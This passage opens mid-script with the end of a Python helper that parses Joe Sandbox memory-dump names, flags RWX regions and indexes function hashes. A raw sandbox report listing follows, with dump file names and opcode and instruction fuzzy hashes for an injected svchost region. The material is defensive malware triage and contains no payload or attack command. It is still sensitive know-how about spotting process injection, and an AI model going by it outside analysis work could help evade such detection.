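    """Distinct (process, base) regions whose dump name carries PAGE_EXECUTE_READWRITE."""
    seen = {(d["process_index"], d["base"])
            for d in (parse_dump_name(r["Source File"]) for r in records)
            if d["protection"] == 0x40}
    return sorted(seen)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(parse_dump_name(r["Source File"]), check_record(r) or "ok")
    print(rwx_regions(recs))
    for h, where in pivot_index(recs).items():
        print(h, where)
```

Both sample regions decode to PAGE_EXECUTE_READWRITE at a non-image address ("based on PE: false"), which is the usual shape of an unpacked payload lifted from a hollowed or injected process; the pivot index is what you would match against the same listing in other reports to see whether the same functions recur.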
Memory Dump Source
• Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1533705879025c6e7771f56cdc9e1a4c4a96090d490cbaea0b20b71fd71a168
• Instruction ID: 24357c6c648bd7a5a850eb76644d28a02976ed6e9a0d2461bdb741a259afa090
• Opcode Fuzzy Hash: a1533705879025c6e7771f56cdc9e1a4c4a96090d490cbaea0b20b71fd71a168
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E512361B0E68A0FE397AB3CD8555B57BE1DF8722170941FBD48CC72A3EC58AC468352
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
                                                                                                                                                                                                                                              • Instruction ID: b146b2384389625c43987c70c9937261856e3920392955cbe504822992d05d04
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF3109A1B1D9094FE745BFBCC80A7BC77E1EF99302F0442BAE50CC3292DD2858028352
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 292d0214d28dbaf032add1b1fc01099f8324b2bad78f1a91647527df2bc07cb0
                                                                                                                                                                                                                                              • Instruction ID: e25bfa82f0d72758fe55262065ed174557831900722b460b8bfb68393e36fe13
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292d0214d28dbaf032add1b1fc01099f8324b2bad78f1a91647527df2bc07cb0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5831CD70A19A0E8FEB45FFB8C4956E9B7E2FF88311F5445B8D009C7296DE38A802C754
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bbedc4039ffae1ad01913f1a058956613be33f411a5c25968428d8fe539b9d16
                                                                                                                                                                                                                                              • Instruction ID: dc333646d6495003c38a1579d87cf365f6a9cd2cf39dd9063f94d7e2686caf93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbedc4039ffae1ad01913f1a058956613be33f411a5c25968428d8fe539b9d16
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921B164A19A4D9FE381FF28C0945E9BBB5EF85325B8040E5D84DC33DACE2C5801C759